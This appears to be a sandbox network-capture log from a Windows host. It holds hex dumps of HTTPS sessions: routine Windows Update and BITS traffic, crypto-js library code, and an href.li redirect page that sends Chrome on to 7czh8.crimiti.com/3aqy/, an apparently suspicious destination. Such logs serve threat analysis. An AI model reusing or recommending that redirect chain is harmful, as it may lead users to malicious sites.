                                                                                                                                                                                                                                                                      2024-08-21 18:28:34 UTC478INData Raw: 31 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 68 72 65 66 2e 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 37 43 5a 68 38 2e 63 72 69 6d 69 74 69 2e 63 6f 6d 2f 33 61 71 79 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28
                                                                                                                                                                                                                                                                      Data Ascii: 1d2<!DOCTYPE html><html><head><title>href.li</title><meta http-equiv="Refresh" content="0; url=https://7CZh8.crimiti.com/3aqy/" /><meta name="referrer" content="no-referrer" /><script type="text/javascript">/* <![CDATA[ */window.location.replace(


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      4192.168.2.549717184.28.90.27443
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                      X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=80044
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      5192.168.2.54971613.85.23.86443
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+GmgovDSPBzpvFk&MD=gD7TEatm HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                      MS-CorrelationId: 5a559215-6a1d-44e6-8754-cd1676ff7675
                                                                                                                                                                                                                                                                      MS-RequestId: 031f54aa-1367-47f3-859d-074c8c3b4bc4
                                                                                                                                                                                                                                                                      MS-CV: xlJaueBLhEi+FmBq.0
                                                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:34 GMT
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      6192.168.2.549722104.17.25.144432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                      ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Age: 596865
                                                                                                                                                                                                                                                                      Expires: Mon, 11 Aug 2025 18:28:35 GMT
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtKfU8FXlTtHE%2FDshuSQkwWTDAScNp170ZSaNb4OyP23ajdg%2FzmjMJJijGI38F9KweYNBuHgxkMjCKNnE8tR6dc63bWs7d3Nk97rIrmb2KXpyIS32iuSDpedEUAX1CsOh8%2FzR8LQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8b6caf098c8d0cf1-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                      Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                                                                      Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                      Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                                                                                                                                                                                                                                                                      Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                                                                                                                                                                                                                                                                      Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                                                                                                                                                                                                                                                                      Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                                                                                                                                                                                                                                                                      Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                                                                                                                                                                                                                                                                      Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                                                                                                                                                                                                                                      Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                                                                                                                                                                                                                      Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      7192.168.2.549723188.114.96.34432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC651OUTGET /3aqy/ HTTP/1.1
                                                                                                                                                                                                                                                                      Host: 7czh8.crimiti.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
